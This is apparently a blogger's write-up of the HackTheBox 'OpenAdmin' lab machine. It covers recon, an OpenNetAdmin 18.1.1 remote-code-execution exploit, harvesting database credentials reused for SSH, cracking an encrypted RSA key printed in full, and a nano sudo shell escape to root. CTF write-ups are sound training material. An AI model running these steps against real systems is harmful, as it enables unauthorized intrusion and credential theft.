[HTB Writeup]: Openadmin HackTheBox Challenge
![[HTB Writeup]: Openadmin HackTheBox Challenge](https://foxtrotlabs.cc/2020/08/htb-writeup-openadmin-hackthebox-challenge/cover.png)
Table of Contents
<disclaimer>this is an old post, that was finished some time ago (February 2020), but due to the things (I forgot about retiring the machine) I’m publishing it now</disclaimer>
It’s been a looooong time…⌗
… since I’ve written something here. This place is not dead yet. I had really tight schedule with my security job, school, CTFs and PozSec meetups organization soooo it was really hard to start blogging again. I’m still learning so some topics I want to cover in depth require some time. But here I am with pretty easy challenge from HTB. It is my first HTB writeup and now I cannot wait to publish it! But I have to wait for the embargo to exceed.
Recon⌗
First things first. Box is located at 10.10.10.171 address. I’ve added an entry to /etc/hosts to localize it by domain name.
10.10.10.171 oneadmin.htb
Nmap scan didn’t show anything interesting:
sudo nmap -T aggressive -sC -sV 10.10.10.171
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-21 01:32 CET
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.053s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds
Recon with -p- options gave nothing new. Standard ssh service and a single http server running on port 80. HTB is not about bruteforcing, so without initial foothold trying to leak users with this enumeration exploit is rather bad idea. Next part of the recon included running gobuster on / directory.
gobuster dir -u 10.10.10.171 -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
The tool has found some pages on the host:
artwork
music
sierra
And some forbidden_403_not_so_interesting_stuff (looked like rules to redirect all .htaccess etc.). Recursive search on given domains gave some files, but nothing particulary important.
gobuster dir -u 10.10.10.171/artwork -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,
gobuster dir -u 10.10.10.171/msuic -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
gobuster dir -u 10.10.10.171/sierra -w wordlists/common.txt -t 30 -x .asp,.aspx,.bat,.c,.cfm,.cgi,.com,.dll,.exe,.htm,.html,.inc,.jhtml,.jsa,.jsp,.log,.mdb,.nsf,.php,.phtml,.pl,.reg,.sh,.shtml,.sql,.txt,.xml
At this point after analysis of the content of hosted files I had really hard time. Nothing to see here, but there must have be something…
In the meantime I’ve tried to enum ssh users using CVE-2018-15473since OpenSSH version 7.6p1 but that was the dead end with false positives only. After changing the method in msf no results were returned. Other tool also has failed.
Stuck⌗
Sometimes during the pentest it is really nice to have a collection of all hyperlinks on the website. Probably there will be something interesting. I’ve written a simple and really fast crawler to achieve that. Here is the most important part of the generated report.
[...]
=== REPORT ===
=== IN WEBSITE LINKS ===
+-----------------------------------------+-----------------------------------------+
| source | target |
+=========================================+=========================================+
| http://10.10.10.171/music/contact.html | http://10.10.10.171/music/blog.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/playlist.html | http://10.10.10.171/music/blog.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/artist.html | http://10.10.10.171/music/category.html |
+-----------------------------------------+-----------------------------------------+
| http://10.10.10.171/music/index.html | http://10.10.10.171/ona | <- this entry
+-----------------------------------------+-----------------------------------------+
[...]
It’s really a pitty that this wasn’t found by some popular wordlists for dirbusting. But well, yeah. Back on track.
Local shell⌗
/ona redirected to OpenNetAdmin 18.1.1. The tool for managing inventory of your network. This version is vulnerable and RCE and the PoC was published. Unfortunately the .sh script hasn’t worked for me. Finally I’ve found the right exploit which gave a really simple shell for www-data user.
> python ona-rce.py exploit http://10.10.10.171/ona
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$
Poking around⌗
Next stage of the enumeration involved looking around to obtain a real shell, probably ssh to the machine. At this time I’ve decided not to create any type of more complicated shell with for example a python tty. Just looked around for available stuff.
sh$ ls -la
total 88
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 .
drwxr-x--- 7 www-data www-data 4096 Nov 21 18:23 ..
-rw-rw-r-- 1 www-data www-data 1970 Jan 3 2018 .htaccess.example
-rw-r--r-- 1 www-data www-data 16384 Feb 20 20:33 .login.php.swp
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 config
-rw-rw-r-- 1 www-data www-data 1949 Jan 3 2018 config_dnld.php
-rw-rw-r-- 1 www-data www-data 4160 Jan 3 2018 dcm.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 images
drwxrwxr-x 9 www-data www-data 4096 Jan 3 2018 include
-rw-rw-r-- 1 www-data www-data 1999 Jan 3 2018 index.php
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 local
-rw-rw-r-- 1 www-data www-data 4526 Jan 3 2018 login.php
-rw-rw-r-- 1 www-data www-data 1106 Jan 3 2018 logout.php
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 modules
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 plugins
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 winc
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 workspace_plugins
Grepping directiories and searching for the password redirected to the local/config directory.
sh$ ls -la local
total 20
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 .
drwxrwxr-x 10 www-data www-data 4096 Feb 20 20:33 ..
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 config
drwxrwxr-x 3 www-data www-data 4096 Jan 3 2018 nmap_scans
drwxrwxr-x 2 www-data www-data 4096 Jan 3 2018 plugins
With database_settings.inc.php in it.
sh$ ls -la local/config
total 16
drwxrwxr-x 2 www-data www-data 4096 Nov 21 16:51 .
drwxrwxr-x 5 www-data www-data 4096 Jan 3 2018 ..
-rw-r--r-- 1 www-data www-data 426 Nov 21 16:51 database_settings.inc.php
-rw-rw-r-- 1 www-data www-data 1201 Jan 3 2018 motd.txt.example
-rw-r--r-- 1 www-data www-data 0 Nov 21 16:28 run_installer
Further look at that file gave some really interesting results.
sh$ cat local/config/database_settings.inc.php
MySQL creds laying on the ground.
[...]
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
[...]
))
I’ve tried listing users on the box. I did it simply by checking the home directory on the host.
sh$ ls -la /home
total 16
drwxr-xr-x 4 root root 4096 Nov 22 18:00 .
drwxr-xr-x 24 root root 4096 Nov 21 13:41 ..
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 jimmy
drwxr-x--- 6 joanna joanna 4096 Nov 28 09:37 joanna
Attempted to do some kind of password spraying attack. Got three accounts on the host (with root), one password and after one try, I’ve managed to login! Remember users never ever reuse your passwords.
ssh jimmy@10.10.10.171
jimmy@10.10.10.171's password: n1nj4W4rri0R!
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Feb 20 20:53:53 UTC 2020
System load: 0.24 Processes: 118
Usage of /: 50.8% of 7.81GB Users logged in: 0
Memory usage: 27% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Last login: Thu Jan 2 20:50:03 2020 from 10.10.14.3
jimmy@openadmin:~$ ls
Looked like the first shell had been spawned. But no user.txt file was there. Needed to look deeper [meme].
Priviliage escalation⌗
It was time to do some priv esc. Firstly to obtain access to joanna home directory, then root.
Horizontal⌗
In general there are two types of priviliage escalation. Horizontal means trying to get another users that are not power users like root. But they may belong to different groups and have read and write rights to some interesting locations. My obvious choice was to target joanna’s account.
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr 4 2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile
jimmy@openadmin:~$ cat .bash_history
jimmy@openadmin:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jimmy@openadmin:~$ sudo !!
sudo cat /etc/shadow
[sudo] password for jimmy:
jimmy is not in the sudoers file. This incident will be reported.
jimmy@openadmin:~$ w
20:54:54 up 1:59, 1 user, load average: 0.09, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
jimmy pts/0 10.10.14.7 20:53 0.00s 0.05s 0.00s w
I’ve run LinEnum.sh script but found nothing unusual. My main focus was redirected to /var/www directory. There was an internal directory exposed by Apache server on 52846 port.
jimmy@openadmin:/var$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
And AssignUserID was set to joanna.
The directory presented three .php files with one that was particulary interesting.
jimmy@openadmin:/var/www/internal$ ls
index.php logout.php main.php
The main.php source code presented below had shell_exec('cat /home/joanna/.ssh/id_rsa') directive. This should have cat (and then embed) the private RSA key of user joanna on the visited website.
jimmy@openadmin:/var$ cat www/internal/main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
Tried to run main.php on the right port and got pretty meaningful response.
jimmy@openadmin:/var$ curl -ksi 127.0.0.1:52846/main.php
HTTP/1.1 302 Found
Date: Thu, 20 Feb 2020 21:42:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Set-Cookie: PHPSESSID=uk2vqsqf0o2kmdghf9vakc87dj; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /index.php
Content-Length: 1902
Content-Type: text/html; charset=UTF-8
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D
kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
But as presented above the private key was encrypted. There was a hint to remember about ninja password. I didn’t remember any, so downloaded john toolkit and rockyou.txt dictionary for the beginning.
~/devp/htb/openadmin ❯ ssh2john things.key joanna.hash
~/devp/htb/openadmin ❯ john joanna.hash -wordlist=/home/rav/tools/SecLists/rockyou.txt
Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl"
Use the "--format=ssh-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas (joanna_ssh.key)
Warning: Only 1 candidate left, minimum 8 needed for performance.
1g 0:00:00:03 DONE (2020-02-20 23:59) 0.2570g/s 3686Kp/s 3686Kc/s 3686KC/s *7¡Vamos!
Session completed
Two seconds later john cracked the password: bloodninjas. I’ve used in combination with the key and finally logged as joanna! Got user.txt file. So this part of the challenge was done.
~/devp/htb/openadmin ❯ ssh -i things.key joanna@10.10.10.171
Enter passphrase for key 'things.key':
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Feb 20 22:04:05 UTC 2020
System load: 0.0 Processes: 124
Usage of /: 51.2% of 7.81GB Users logged in: 1
Memory usage: 35% IP address for ens160: 10.10.10.171
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Jan 2 21:12:40 2020 from 10.10.14.3
joanna@openadmin:~$ ls -la
total 332
drwxr-x--- 6 joanna joanna 4096 Feb 20 22:22 .
drwxr-xr-x 4 root root 4096 Nov 22 18:00 ..
lrwxrwxrwx 1 joanna joanna 9 Nov 22 18:02 .bash_history -> /dev/null
-rw-r--r-- 1 joanna joanna 220 Nov 22 18:00 .bash_logout
-rw-r--r-- 1 joanna joanna 3771 Nov 22 18:00 .bashrc
drwx------ 2 joanna joanna 4096 Nov 22 22:42 .cache
drwx------ 3 joanna joanna 4096 Nov 22 22:42 .gnupg
-rwxrwxr-x 1 joanna joanna 46632 Feb 20 22:08 linenum.sh
drwxrwxr-x 3 joanna joanna 4096 Nov 22 18:53 .local
-rwxrwxr-x 1 joanna joanna 34317 Feb 20 22:09 lse.sh
-rw------- 1 joanna joanna 8 Feb 20 22:22 nano.save
-rw-r--r-- 1 joanna joanna 807 Nov 22 18:00 .profile
-rw-rw-r-- 1 joanna joanna 204173 Feb 20 22:17 report.txt-20-02-20
drwx------ 2 joanna joanna 4096 Nov 23 17:31 .ssh
-rw-rw-r-- 1 joanna joanna 33 Nov 28 09:37 user.txt
-rw------- 1 joanna joanna 1689 Feb 20 22:09 .viminfo
joanna@openadmin:~$ wc -c user.txt
33 user.txt
I’ve uploaded LinEnum.sh and lse.sh scripts for vertical priviliage escalation. Both scripts found that user joanna can run /bin/nano /opt/priv with SUDO and without the password.
Vertical⌗
The GTFOBins (this is particulary for nano but there are other awesome too) are snippets for spawning shell by many binaries available on the GNU/Linux machines. This time one of the methods worked for me and allowed to spawn the root shell.
nano
^R^X
reset; sh 1>&0 2>&0
And here is the dump of commands used as root. Haven’t tried to create more reliable shell since wanted only to gather the output from root.txt file.
Command to execute: reset; sh 1>&0 2>&0# whoami
rootet Help ^X Read File
# cat /root.txt M-F New Buffer
cat: /root.txt: No such file or directory
# ls
linenum.sh lse.sh nano.save report.txt-20-02-20 user.txt
# cd ~
# ls
linenum.sh lse.sh nano.save report.txt-20-02-20 user.txt
# ls /
bin cdrom etc initrd.img lib lost+found mnt proc run snap swap.img tmp var vmlinuz.old
boot dev home initrd.img.old lib64 media opt root sbin srv sys usr vmlinuz
# ls /root
root.txt
# cat /root/tx
cat: /root/tx: No such file or directory
# cat /root/root.txt
2f907ed450b361b2c2bf4e8795d5b561
# wc -l /root/root.txt
1 /root/root.txt
# wc -c /root/root.txt
33 /root/root.txt
Which was successfull.
Bottom line⌗
I’ve really enjoyed this box. OpenAdmin Challenge was a little bit tricky and all about the enumeration. Nothing fancy and no binary exploitation here. But I’ve learned one more time that sometimes provided tools are not reliable.
Thank you for reading and see ya next time!
foxtrot_charlie over and out!